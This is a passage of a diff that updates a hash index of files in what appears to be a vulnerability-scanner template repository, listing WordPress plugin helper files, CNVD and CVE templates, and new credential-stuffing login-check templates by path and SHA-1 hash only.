-helpers/wordpress/plugins/formidable.txt:f454be7d464d6c09f200806744a41ceb54f6bcfd -helpers/wordpress/plugins/forminator.txt:f005898d75b9e603c42888193664960d86c97963 +helpers/wordpress/plugins/formidable.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 +helpers/wordpress/plugins/forminator.txt:bbaf47909306821eec059ce49a6349fa542bdd17 helpers/wordpress/plugins/ga-google-analytics.txt:361f82e0e4329314b5ec0ac3b14d43cb15fc0c02 -helpers/wordpress/plugins/gdpr-cookie-compliance.txt:95b4f085ec6b3a33a23781c7cfda78c317e5dca1 -helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:65787184d679948aa64dabac2bb2d3f9e00dea4e -helpers/wordpress/plugins/google-analytics-for-wordpress.txt:8f7450f8b4a3aed9a792a8f7283641b550e38cdc -helpers/wordpress/plugins/google-listings-and-ads.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b -helpers/wordpress/plugins/google-site-kit.txt:5a95cde7cbc1051b025062f18cc88a816209e7be +helpers/wordpress/plugins/gdpr-cookie-compliance.txt:b51e37a1939bf22a226cba6aa16aa556b5bdfdf3 +helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:6b474cdaf13fc941946668ffea3b8a5047fc2c73 +helpers/wordpress/plugins/google-analytics-for-wordpress.txt:efa2314fd79dfeb6c6a4f1283847a5e31dbed204 +helpers/wordpress/plugins/google-listings-and-ads.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 +helpers/wordpress/plugins/google-site-kit.txt:36783a832f727ead000f1bce63fd4a599fded929 helpers/wordpress/plugins/google-sitemap-generator.txt:9a1ae806a7c678b6c9b4895b016033f980c1bf10 helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 -helpers/wordpress/plugins/gutenberg.txt:e3cb1bf58bbe8144de22d3f09a55c84dc5570b6c +helpers/wordpress/plugins/gutenberg.txt:12a04d509e74f421d6249526e0000d4f5d6bd2ba helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 -helpers/wordpress/plugins/header-footer-code-manager.txt:a9b04c078e104df6d0bcb7eef6320eee0aa3c10f +helpers/wordpress/plugins/header-footer-code-manager.txt:146a128cb228ff86b836ce978784899316061fa7 helpers/wordpress/plugins/header-footer-elementor.txt:d6ab5c24c2a579838aac03076b8203376ce1d618 helpers/wordpress/plugins/header-footer.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/health-check.txt:40e124dcbde01bd9224f2d58906f34c83d1441ae helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 -helpers/wordpress/plugins/host-webfonts-local.txt:37e35b0619317de7194c2415b0e15cc6e73933d7 +helpers/wordpress/plugins/host-webfonts-local.txt:123e45bc54289de17a722e36670d56319ee92f93 helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 -helpers/wordpress/plugins/insert-headers-and-footers.txt:fefed34c88a4926b37d965db8c15fed2727796a6 +helpers/wordpress/plugins/insert-headers-and-footers.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6 -helpers/wordpress/plugins/iwp-client.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/jetpack.txt:2eadbe80c378cf7752a2b772cb7af49d6460a84d -helpers/wordpress/plugins/kadence-blocks.txt:da95f1ff0c883385dc8a301981fe2fece65e1a11 -helpers/wordpress/plugins/kirki.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca +helpers/wordpress/plugins/iwp-client.txt:e2f2e225c4ff1ca0a8c0083ca61d7e9717bb61d5 +helpers/wordpress/plugins/jetpack.txt:d79add1d313daf5c9b7fa689d21d6966e60c2ea0 +helpers/wordpress/plugins/kadence-blocks.txt:5ccd149c585cb813fee3007ec54feb05080f7e34 +helpers/wordpress/plugins/kirki.txt:2cbc97154c127c59a298a4207a147a2fff01b48f helpers/wordpress/plugins/leadin.txt:95ba3b4a144f5396717c4b2c6fa194b83d2adea6 -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:e4acd22ee3d609cd1f66084c29d07f68ab2d32c4 +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:d4dbf56812ab4702a984154c87a3e904d467f063 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/litespeed-cache.txt:2e764b34bb9cf18ff85fc0a77c2cd10063248c10 +helpers/wordpress/plugins/litespeed-cache.txt:5f66ffa0d783df84c67ba37533f91b9f3782a063 helpers/wordpress/plugins/loco-translate.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 helpers/wordpress/plugins/loginizer.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9 -helpers/wordpress/plugins/loginpress.txt:348b6913760dfd78a9394bc38c5a8fa7528208e2 +helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/mailchimp-for-wp.txt:2c60ab26669078189674a703e16bd8295ec61c88 -helpers/wordpress/plugins/mailpoet.txt:53f4120c5d4bba3a82e0e2899fa75112864771c1 +helpers/wordpress/plugins/mailchimp-for-wp.txt:3117538b6909fe203f45b8cdf89723893fa9aa44 +helpers/wordpress/plugins/mailpoet.txt:8ed036668dac1d8be54fd262946d9ddf7f346cef helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 -helpers/wordpress/plugins/mainwp-child.txt:51cbcb0941f4181aab74224b7105fd44cb905d42 +helpers/wordpress/plugins/mainwp-child.txt:980feb4697a9a59378889074eb2a9c667eb85231 helpers/wordpress/plugins/malcare-security.txt:8a354e6fda90148b0c22992b849e693b1ed6749f helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 -helpers/wordpress/plugins/meta-box.txt:e8eea86ae4c46099848f3535a6610e2faf76f4c1 -helpers/wordpress/plugins/ml-slider.txt:41189fb0a024491b57bd8e338a8b5853fe6265c5 -helpers/wordpress/plugins/newsletter.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa -helpers/wordpress/plugins/nextend-facebook-connect.txt:53944901bfcfa1a331d039912370c152f70a7110 +helpers/wordpress/plugins/meta-box.txt:8a4874fdff1ab036389b4739f479332aa0c63551 +helpers/wordpress/plugins/ml-slider.txt:d95eb74054f74c17f26d8fb9735af553bddddade +helpers/wordpress/plugins/newsletter.txt:abdb334b7c43837f64108a70a2a66817e130b80c +helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:9144c432d473baecd93eb0985d3874cf3bb6a126 -helpers/wordpress/plugins/ninja-forms.txt:3a95c05c2b11baae963cb6d882f24f0cfb92de28 +helpers/wordpress/plugins/ninja-forms.txt:b1fa250248667d473f40086fa4a2cd4645e99d0f helpers/wordpress/plugins/ocean-extra.txt:5f6af51e77b84cd6616d4eaa100a736096568d86 -helpers/wordpress/plugins/official-facebook-pixel.txt:4853b8ea265b7f596e642998396e75733ac23e75 +helpers/wordpress/plugins/official-facebook-pixel.txt:c7a799ba251102d32c4623f4036bddb752445f20 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 -helpers/wordpress/plugins/optinmonster.txt:78b09839fc029f512370d53f92853fb92ad28a43 +helpers/wordpress/plugins/optinmonster.txt:d0cbe674a49975e50331a1a279e25a39e714edab helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/password-protected.txt:1ff0f47f469eb98d13878242f03511f986edbcd4 helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:d74e3a7c982dd8d79d90efee159d12d67876affc helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pixelyoursite.txt:5ee17f2de5fd28138fc55cf9fe1c898ec1c67259 -helpers/wordpress/plugins/polylang.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 +helpers/wordpress/plugins/pixelyoursite.txt:d6ec1f7edbdfc1e01ffb78ab8d2025e5ae4a6e8c +helpers/wordpress/plugins/polylang.txt:23d49915eae53800c735cfc0f01c21a9d05e727a helpers/wordpress/plugins/popup-builder.txt:9d6a9d6356ced33784bbde254c46c600df05d71f helpers/wordpress/plugins/popup-maker.txt:c70da539b9e83a50bb70013e6a5cb6e9d4623d5c -helpers/wordpress/plugins/post-smtp.txt:89941265e418c7729912b574c9b29eff77c5b172 -helpers/wordpress/plugins/post-types-order.txt:d77590d37919716846277a4d8ee2e51fef66a9ef -helpers/wordpress/plugins/premium-addons-for-elementor.txt:26f0040ffcee1a331bafe2204af353696199c94e +helpers/wordpress/plugins/post-smtp.txt:106ca8d85638866255a70e746e9653cec398864b +helpers/wordpress/plugins/post-types-order.txt:ccc7f2bf6d0604d86f3d33a12b75411b311e9dfe +helpers/wordpress/plugins/premium-addons-for-elementor.txt:9b2f4c3c25986436f50e7581b0398720d5de37be helpers/wordpress/plugins/pretty-link.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/really-simple-ssl.txt:50611efdbfcaeb0212b16901bea6240d6ca5bae8 +helpers/wordpress/plugins/really-simple-ssl.txt:cfb1a020caaeba8b61a9e907652aed3d696c8ce9 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 -helpers/wordpress/plugins/redux-framework.txt:6328e55f0b8c991dca9b1bed7c3b0763f63cd1bf +helpers/wordpress/plugins/redux-framework.txt:68a50e98458a9c28886ed15ffb2cc666b2d3d49b helpers/wordpress/plugins/regenerate-thumbnails.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/safe-svg.txt:d24fa45ca77f079cc359c97272276969e6aead2c -helpers/wordpress/plugins/seo-by-rank-math.txt:49f6c023b18562b3cbd029b1a90dfc9f8f5b0c36 -helpers/wordpress/plugins/sg-cachepress.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d +helpers/wordpress/plugins/seo-by-rank-math.txt:aa66ca91043cb47f7b1ca18775c6c15b64833ecf +helpers/wordpress/plugins/sg-cachepress.txt:0ead27062f705c3ed0f2b1ac2ad2a7f47418176c helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4 helpers/wordpress/plugins/shortcodes-ultimate.txt:404069cef132c1712e21fc32e891e96cf01bca92 -helpers/wordpress/plugins/shortpixel-image-optimiser.txt:d58c9b12a8f327dba6be02a31daef9f6ad4aef4a +helpers/wordpress/plugins/shortpixel-image-optimiser.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f helpers/wordpress/plugins/simple-custom-post-order.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:b26853e0fc7b2e0fccdc39c5fe508249d0d5d410 -helpers/wordpress/plugins/siteorigin-panels.txt:7dfeaccf2bfa5a797e3c810b6402181ef9cada12 -helpers/wordpress/plugins/smart-slider-3.txt:1ab07ecefc8edb2f355472d191a0c62b270b52c5 -helpers/wordpress/plugins/so-widgets-bundle.txt:956903f45cc00701504779074feaff80af970c53 +helpers/wordpress/plugins/siteorigin-panels.txt:5fdba26ba529915663d4311cc1362f22864a8e07 +helpers/wordpress/plugins/smart-slider-3.txt:019cd315d24bf8c45d16ae549ca11cb10c693b19 +helpers/wordpress/plugins/so-widgets-bundle.txt:b1ecd0b9faa514907787dbd64b1b11175638192f helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:d066a99c3f5aa1e607b95c7832507676b00beca4 helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9 helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb -helpers/wordpress/plugins/tablepress.txt:5b7155a36d36681935655d772bbc981bc2393fa3 +helpers/wordpress/plugins/tablepress.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 helpers/wordpress/plugins/taxonomy-terms-order.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e -helpers/wordpress/plugins/the-events-calendar.txt:bb523e5dc0b2c4d957060150818fa8eec0669b72 +helpers/wordpress/plugins/the-events-calendar.txt:1d262444e1b31be97e0a0a87e22c14ff2b5da051 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf -helpers/wordpress/plugins/translatepress-multilingual.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 +helpers/wordpress/plugins/translatepress-multilingual.txt:c696496c332f4053d974090a9c80d9d35ebc2ca6 +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:591d71e97a25db692c2f038dbb7d616569b743f4 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d -helpers/wordpress/plugins/updraftplus.txt:6a5de29ff8ee2972e67122b849b5dde32e6ef3aa +helpers/wordpress/plugins/updraftplus.txt:ae159df5f109948cfff953af10b1dfdfb65e0adf helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c4743d helpers/wordpress/plugins/user-role-editor.txt:60504bf1a7119035ab8f7a2f8b0e566bf4a6dff3 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 +helpers/wordpress/plugins/w3-total-cache.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 helpers/wordpress/plugins/webp-converter-for-media.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1 -helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d176141136f1fe969aeca56eb98e3734f24199ae +helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:57f75e869bf26cdb7eaddcd7bb1de6cfbb0594c3 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa -helpers/wordpress/plugins/woocommerce-payments.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:d77590d37919716846277a4d8ee2e51fef66a9ef -helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:2ecfb0067f356894b6b052ef3c3554dc7fb3f814 +helpers/wordpress/plugins/woocommerce-payments.txt:eecaf8be5654f259a19f021dd696c8aed0425326 +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:d1325bb186bd83303245e504f7c6eceae7f19e44 +helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:d2c7dc39f7a599e653154733c2f9c606bee5474c helpers/wordpress/plugins/woocommerce-services.txt:5da596d45f9d6516efc24f110a7c87475a984016 -helpers/wordpress/plugins/woocommerce.txt:3205a3ed2bbeb38c72f0389b844cd9b99117f38b +helpers/wordpress/plugins/woocommerce.txt:373a109947826f162ef5dba14dc054105c72c5ca helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da -helpers/wordpress/plugins/wordfence.txt:96a20c8da2810939fa60d2647f8273c2251ad539 +helpers/wordpress/plugins/wordfence.txt:99023f12d2da25d516e16bc9f575d0e206f3d843 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 -helpers/wordpress/plugins/wordpress-seo.txt:c7967623be94ca1949fe1120c553e9ccfc1e4ebc +helpers/wordpress/plugins/wordpress-seo.txt:e3b2fa2d53252ae85167f5cf704e5f9583c60355 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-fastest-cache.txt:3c29497c8cc2d62bb47eefabe9fd92db280b4cab +helpers/wordpress/plugins/wp-fastest-cache.txt:8568632c41ff7f9333d195465d8dcb607d85d876 helpers/wordpress/plugins/wp-file-manager.txt:463810c87a57507ca005dd6a19aab00e209bb4b7 helpers/wordpress/plugins/wp-google-maps.txt:f593dd38154ae03f8ad23a9a3382622eee3e3bf4 helpers/wordpress/plugins/wp-mail-smtp.txt:95f4583e327a11aaa1ea09292b7411fda3205655 -helpers/wordpress/plugins/wp-maintenance-mode.txt:f8b1cdd780aa1026f0dd192b2c25ed46c6cbe798 +helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 helpers/wordpress/plugins/wp-migrate-db.txt:f8b1cdd780aa1026f0dd192b2c25ed46c6cbe798 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd helpers/wordpress/plugins/wp-optimize.txt:7a538645c3b7e9301a46c2d2aeb6d638783ac0e3 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 -helpers/wordpress/plugins/wp-smushit.txt:5686950f2f428815c60b1d52a9d975e0c5220d0f +helpers/wordpress/plugins/wp-smushit.txt:9fa03c66ac4ea9ec21b6098ba43e9b00b5292ee0 helpers/wordpress/plugins/wp-statistics.txt:abe921367c8e125cf93ae37799251c8c4dc1bd22 helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf -helpers/wordpress/plugins/wp-user-avatar.txt:bbac036098e807dc50d4cce4dd873d989e25102c +helpers/wordpress/plugins/wp-user-avatar.txt:06a4c8fb3498a24c86d06fd73d56763fee83924e helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e helpers/wordpress/plugins/wpcf7-redirect.txt:0aaa3cea7451675ff270540e13308210d8fce9ab -helpers/wordpress/plugins/wpforms-lite.txt:653c716c2da1ac502156b3c3d079484bd7ab6dac +helpers/wordpress/plugins/wpforms-lite.txt:868b573d10d425a212e9438804c270d24af5dd12 helpers/wordpress/plugins/wps-hide-login.txt:fa12796bd5aa83d02e53616812c25306cd1d6917 -helpers/wordpress/plugins/wpvivid-backuprestore.txt:2e398a730d7921539849eae91b7aebc16f3b7bd3 +helpers/wordpress/plugins/wpvivid-backuprestore.txt:49feb32c60e1255682fa64acbf4187f69e8eb071 helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 -helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:c4f3eeb3dfb9378c15dd4171d82f145cfe27f068 +helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:c1561cd7b973a41baaf95516c020fd65e8656f28 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c http/cnvd/2018/CNVD-2018-13393.yaml:13b1a2ac4e1ec4b1ef4bdad396ee00e2c6a43269 http/cnvd/2019/CNVD-2019-01348.yaml:1e372017ae1710cbd85791f9b0a925bf03573f8c @@ -390,6 +399,7 @@ http/cnvd/2020/CNVD-2020-26585.yaml:8aacad7ec4ad79c44c33e709418d9e077f480acc http/cnvd/2020/CNVD-2020-46552.yaml:899c828473c63acbec7e1999a50a434b04548bf9 http/cnvd/2020/CNVD-2020-56167.yaml:8a43ffb8415ad476eeb3b516069511c16b98b264 http/cnvd/2020/CNVD-2020-62422.yaml:4d7fa34989bc5b9af2af28e81ed17a26b2e86db3 +http/cnvd/2020/CNVD-2020-63964.yaml:c80ab1148d417f0566d0bcb096409bfed16c3e2e http/cnvd/2020/CNVD-2020-67113.yaml:9fd7ec8d5f122e7ddc8ed3028904453f63f14c56 http/cnvd/2020/CNVD-2020-68596.yaml:a69cd9606bc087c09df887bce1be7933cf7b6d4a http/cnvd/2021/CNVD-2021-01931.yaml:e03061f4ec928b5c409f335546b36825fc1b357c @@ -405,12 +415,30 @@ http/cnvd/2021/CNVD-2021-30167.yaml:0a37c18c7e821a488af40928c89a01a2ad1ee490 http/cnvd/2021/CNVD-2021-49104.yaml:3a25d729d314817f0c9144d7d39a85558b7264dc http/cnvd/2022/CNVD-2022-03672.yaml:694ee5fd18f112ebb2d636c66ce01beaac4286bb http/cnvd/2022/CNVD-2022-42853.yaml:3dae45e305a5f66a69ecc0cb1ccf4d963b29ccb5 -http/cnvd/2023/CNVD-2023-12632.yaml:20745f2ac711d26abb226ea91fd527d25ae0b601 +http/cnvd/2023/CNVD-2023-12632.yaml:ceb1220ec85f8ba6607052d3ab2c9be79bd1a429 +http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 +http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:e265b0ef4cad374b888878d8ebe4cd4bfb3a4c2e +http/credential-stuffing/cloud/atlassian-login-check.yaml:fdc2a219979a9c538febf42cd8170a6cd8f2eabe +http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml:d260b795575b4cc762389acdcc22b7a78c195371 +http/credential-stuffing/cloud/chefio-login-check.yaml:fe52c6e32c4361af2d0fa119b64945fa171526aa +http/credential-stuffing/cloud/codepen-login-check.yaml:07e5a66274daceb69a9b392033cc77d4dddeea6b +http/credential-stuffing/cloud/datadog-login-check.yaml:59e96cfaea16ada436330973c1a1e6b5e3bd73b9 +http/credential-stuffing/cloud/docker-hub-login-check.yaml:7d7f155bb61aefd33650e7aa104353b1abd61fcf +http/credential-stuffing/cloud/gitea-login-check.yaml:06cd8b61171eb7dd4607ef984a61170ae6383645 +http/credential-stuffing/cloud/github-login-check.yaml:6db38de3986e34e5decff0121b9c2cfd91d9026a +http/credential-stuffing/cloud/postman-login-check.yaml:52977264ef5a4e68cc844313aef25fe6667b5156 +http/credential-stuffing/cloud/pulmi-login-check.yaml:02e294ce7b26d5732d8fc396fc12684e9dea1e4e +http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a00a5b797c9617a291afc620ceb09655c7a17dde +http/credential-stuffing/self-hosted/grafana-login-check.yaml:3a3891cc6d5dcf12b812bc128a41388883bccc48 +http/credential-stuffing/self-hosted/jira-login-check.yaml:906c5a83678bc47a75c5aa5a32925b70d24b804e http/cves/2000/CVE-2000-0114.yaml:af678de88ba0c25c5c699691cbbca26e655ca74c +http/cves/2001/CVE-2001-0537.yaml:2ec7796ffa1adbb36f0902dcfc702ce1a6c1508c http/cves/2002/CVE-2002-1131.yaml:ea67e639e7bbc2c8145242b6fdff303688113115 http/cves/2004/CVE-2004-0519.yaml:df333316e5285784c041ca82bba6a73d0fa79a96 +http/cves/2004/CVE-2004-1965.yaml:4f029cd743345b0828e644bfe22f5cdb2c6289b7 http/cves/2005/CVE-2005-2428.yaml:246bbf6fb03f076ff779630bd1c4106232960ad0 http/cves/2005/CVE-2005-3344.yaml:27591d453e9dc2578217bad7e4c3887a7e1c76dc +http/cves/2005/CVE-2005-3634.yaml:53e4a0f21eae5baa81512fff86c6e46345616a01 http/cves/2005/CVE-2005-4385.yaml:0d55934f993ecd80e2b199f6a77e58a97a01a4fe http/cves/2006/CVE-2006-1681.yaml:3a7253abdb750a50667cbc08877b1cf783512ee6 http/cves/2006/CVE-2006-2842.yaml:01bcba15762fb5c7203964229caaaa35fbc94a9d @@ -420,6 +448,7 @@ http/cves/2007/CVE-2007-4556.yaml:00f65f65420e1bb6e6bb2bfa4e20a2f4ad3c1e2f http/cves/2007/CVE-2007-5728.yaml:d4b5c685a578ccb18aac5d7b8aa0893a54c846c5 http/cves/2008/CVE-2008-1059.yaml:e49a7f072cbaaf9148dc9b9b150fd59b54556b23 http/cves/2008/CVE-2008-1061.yaml:a7adad31bcbf40df1e5d7c46f44a4b8afc9611c8 +http/cves/2008/CVE-2008-1547.yaml:2a3bc4a7106f28fe7b9c1deb736327478960980c http/cves/2008/CVE-2008-2398.yaml:1a43c9b37f69b7d0003b94b0ed1bfa175bdf0631 http/cves/2008/CVE-2008-2650.yaml:73108bb81468e3390f929fc6accac1e661b2d434 http/cves/2008/CVE-2008-4668.yaml:42ff6ba0c3ba7bfc0542c3d4f8b67be8f86e6308 @@ -430,13 +459,15 @@ http/cves/2008/CVE-2008-6172.yaml:3e05ffe9c7c5732f96675f67c6c294e674fee836 http/cves/2008/CVE-2008-6222.yaml:5de91170b6439122e58225af81131f02b1c4842c http/cves/2008/CVE-2008-6465.yaml:047c61f0390ce5fe9d4aac4a6c088f8e7a59a7b6 http/cves/2008/CVE-2008-6668.yaml:8dce860ee2b4e5ca9852d805b2ec3cad491760e9 -http/cves/2008/CVE-2008-6982.yaml:d91e46d5104dfc8ce33417426ac84f40bb31bf5b +http/cves/2008/CVE-2008-6982.yaml:77f158133db7dfd77fcee56de869a780388afd5e +http/cves/2008/CVE-2008-7269.yaml:9a878eba6d70e29779c398b82795fdd8b1aa2aac +http/cves/2009/CVE-2009-0347.yaml:94cac75ae859d1033eb7b721e11996594e40b0e0 http/cves/2009/CVE-2009-0545.yaml:cef5f8cd142a53290d9b58aecc4150db3fa5d332 http/cves/2009/CVE-2009-0932.yaml:e1d62d90e53e4550fdd04c273641d95f1d197e16 http/cves/2009/CVE-2009-1151.yaml:1ec744b13396209554f17cb6634411779af0efd7 http/cves/2009/CVE-2009-1496.yaml:714f2ea5f5b9aa52ba0e386ca0113b50a968fa52 http/cves/2009/CVE-2009-1558.yaml:d4330910a9029dd910c04283161dc58fce6a6342 -http/cves/2009/CVE-2009-1872.yaml:66007d7fd53bee56171824893e42edb888de7711 +http/cves/2009/CVE-2009-1872.yaml:5e880dd876dd2eb940b5c1abe0123d6054cd7092 http/cves/2009/CVE-2009-2015.yaml:eadabbf3e350d5830bce6f033d147966cce16519 http/cves/2009/CVE-2009-2100.yaml:a2c9cf4e266ddaef644bfdc218573c347ee12913 http/cves/2009/CVE-2009-3053.yaml:b585c44e8935c695cd1ef4d53678aa6360b3591d @@ -476,7 +507,7 @@ http/cves/2010/CVE-2010-1345.yaml:834810b109e87700aef0c12d69aa15cf46ea33f6 http/cves/2010/CVE-2010-1352.yaml:2130033f1ffcead48fed8820b0877a66a8fd985a http/cves/2010/CVE-2010-1353.yaml:253ab02b27243dd19a4fa3c1d383050ac1bfe318 http/cves/2010/CVE-2010-1354.yaml:f10d27209e6cb2f399f107be61a3efdec39944b4 -http/cves/2010/CVE-2010-1429.yaml:8952f28730223fd8a2ce6d1285a7a4d3f2598979 +http/cves/2010/CVE-2010-1429.yaml:ba757fbab014c40df9857a52a16c1925f357fcfd http/cves/2010/CVE-2010-1461.yaml:1995c09fba6f35087ee6cf2987806c1598e8ebba http/cves/2010/CVE-2010-1469.yaml:d090c61a4b0090783105c2000faab269faffcd9a http/cves/2010/CVE-2010-1470.yaml:5cc76c9ad0a37438a4830a62edb7537dd9340aa0 @@ -496,6 +527,7 @@ http/cves/2010/CVE-2010-1533.yaml:27870f9227b6f5fbc05afb1df8d0d696f1aa3ab6 http/cves/2010/CVE-2010-1534.yaml:2889adb4ea47f256b32c22ff3ff887d147e5c132 http/cves/2010/CVE-2010-1535.yaml:f344369c4b7e5905e00a5aec0899ca69738f8f3e http/cves/2010/CVE-2010-1540.yaml:707bd6cb58dae711f2ae1871436179fa99a24380 +http/cves/2010/CVE-2010-1586.yaml:2e596eff10133f0d84657fe1d69e9db0502c78a6 http/cves/2010/CVE-2010-1601.yaml:2c91d92d72db66ff0263c52150c99e8cc72a2647 http/cves/2010/CVE-2010-1602.yaml:6fb1277e3142751c15e5ac9cee940e30fe6138a1 http/cves/2010/CVE-2010-1603.yaml:e9c5797723709a4a72081743f9746b24e856c003 @@ -571,16 